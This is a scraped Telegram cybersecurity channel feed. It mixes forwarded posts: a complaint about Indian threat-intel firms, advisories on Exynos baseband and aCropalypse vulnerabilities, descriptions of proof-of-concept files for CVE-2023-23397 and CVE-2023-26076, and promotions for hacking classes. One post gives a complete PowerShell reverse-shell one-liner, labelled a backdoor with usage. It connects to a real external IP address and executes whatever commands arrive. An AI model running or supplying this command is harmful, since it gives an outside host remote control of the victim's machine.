CrackCodes 🇮🇳
15.9K subscribers
1.89K photos
386 videos
722 files
3.67K links
Official Websites: https://crackcodes.in |
For Bug Hunters: https://system32.ink

Admin: @MynK0x00
Admin Math: prapattimynk.crackcodes.in


Be Secure~
जय श्री राम
Download Telegram
Forwarded from pkg
In India the best way to come in limelight or Increase Buisness is to abuse the sentiments against the nation itself, People will start talking about you or could be in your perimeter.

Same happening in cybersecurity industry where online telegram users of so called company just see the posts of small kids attacking websites of India which dont have any severe vulnerability of Any APT level/type attack but portraits as huge attack or they are the best company. How ? With telegramic employees ?? Seriously !!! Employees Who see the posts of script kiddies on telegram and makes out the reasearch report. No it will be wrong if i also said research report actually that is paid media reports which is published to make the company big.

Earlier also that company with zero knowledge of employees published the report about malaysian hackers who were just a script Kiddies.

In fact, There are many State Sponsered APT level workers who continuously work for the nation in every country, You never know. The real attacks should be researched out not any attacks which is publically available.

The old generation was disgusting in field of understanding the cybersecurity but these kind of people make this today's generation fool too.
👍5
Forwarded from 卩ro 爪Cracker
🔥Multiple Internet to Baseband Remote Code Execution Vulnerabilities in Exynos Modems
Until security updates are available, users who wish to protect themselves from the baseband remote code execution vulnerabilities in Samsung’s Exynos chipsets can turn off Wi-Fi calling and Voice-over-LTE (VoLTE) in their device settings.Turning off these settings will remove the exploitation risk of these vulnerabilities.

Chipsets to devices, affected products likely include:
💾Mobile devices from Samsung, including those in the S22, M33, M13, M12, A71, A53, A33, A21, A13, A12 and A04 series;
💾Mobile devices from Vivo, including those in the S16, S15, S6, X70, X60 and X30 series;
💾The Pixel 6 and Pixel 7 series of devices from Google;
💾any wearables that use the Exynos W920 chipset; and
💾any vehicles that use the Exynos Auto T5123 chipset.
👍1
Forwarded from 卩ro 爪Cracker
CVE-2023-23397.ps1
2.9 KB
💥CVE-2023-23397-POC-Powershell
Script functions to either send or save calendar NTLM leakage using the ReminderSoundFile option. Run script to load the functions in Powershell, then you can use the examples below as a starting point for using the functions. Requires to be run on a Windows machine with Outlook installed since it uses the Outlook COM object to send emails. Note that it will send the email from the email account associated with Outlook. The current functions will add the meeting start time as of when the script is execute and set it to last 2 hours.
SQL INJECTION CLASS FOR BEGNEERS
LEARN SQL FROM BASICS

TIME - STARTING IN 5 MINUTES ( 7:30)

OUR WEBSITE - system32.ink

BY CERTIFIED ETHICAL HACKER - @x_cyanide_x


ONLY ON THIS DISCUSSION GROUP
https://t.me/cyberdemonsD
Burp Suite tool with a practical demonstration

https://techofide.com/blogs/what-is-burp-suite-how-to-use-burp-suite-burp-suite-tutorial-for-beginners/

Join our group for Exclusive Cyber security content

t.me/ethicalhackingtechofide
CYBER SECURITY ROADMAP

TIME - 18 MARCH( TODAY ) AT 7:30 PM

OUR WEBSITE - system32.ink

BY PROFESSIONALS

ONLY ON THIS DISCUSSION GROUP
https://t.me/cyberdemonsD
Forwarded from pkg
Personal Groups 17th March 9:45Pm.
Forwarded from pkg
Forwarded from pkg
pkg
Photo
This is the translated message of the same Russian group who put the screenshot of Hacked Indian Portals earlier. Now, Delivers the post attack confession.
❤‍🔥1
CYBER SECURITY ROADMAP

TIME - LIVE
COME LETS DISCUSS ABOUT FUTURE IN CYBER SECURITY
OUR WEBSITE - system32.ink

BY PROFESSIONALS

ONLY ON THIS DISCUSSION GROUP
https://t.me/cyberdemonsD
A new blog on Digital Forensics

Learn How to use Volatility | Digital Forensics

https://techofide.com/blogs/what-is-digital-forensics-practical-demo-on-volatility/

This blog will teach you alot of new stuff about digital forensics

A beginner and don't know what exactly digital forensics?

I recommend you to go with this blog to clear your basic concepts

https://techofide.com/blogs/what-is-digital-forensics-how-to-use-digital-forensics-tools/

Join our group for more such Cyber security exclusive content

t.me/ethicalhackingtechofide
Forwarded from Prapatti 爪ㄚ几Ҝ
PowerShell opens a TCP socket on the remote server and executes the input as a command, sending the output back.
Stupid backdoor!

usage:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('106.12.252.10',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
👍4
epco-reserved-poc.dat
263 B
💥Shannon Baseband: Intra-object overflow in NrSmPcoCodec when decoding reserved options(CVE-2023-26076).
There is an intra-object overflow in Shannon Baseband, inside the 5G SM protocol implementation (NrSmMsgCodec as it’s called in Shannon according to debug strings), when decoding the “Extended protocol configuration options” message (IEI = 0x7B).

The problem is that the size of the content isn’t checked before copying it. As the length of content can be up to 255 bytes, copying the content to one of the 6 reservedPco buffers can result in an OOB write.
The array that holds the “Reserved” option data isn’t in a standalone allocation, rather this array is a part of a larger structure. Thus, an OOB write as described above overwrites other data within the same structure. It is currently unclear what kind of data lies after the 6 reservedPco buffers within reach of the overwrite.

🔖An “Extended protocol configuration options” message that triggers the overflow is provided in epco-reserved-poc.dat.
🔥Exploiting aCropalypse: Recovering Truncated PNGs.
aCropalypse(CVE-2023-21036, Information disclosure in Pixel's Markup) is a serious privacy vulnerability in the Google Pixel's inbuilt screenshot editing tool, Markup, enabling partial recovery of the original, unedited image data of a cropped and/or redacted screenshot.

🔖Demo available here.
A video on Digital Forensics

Volatility

A video on Digital Forensics

https://youtu.be/wsaWF8lEnPw
Forwarded from ELEMENT-/-11
This media is not supported in your browser
VIEW IN TELEGRAM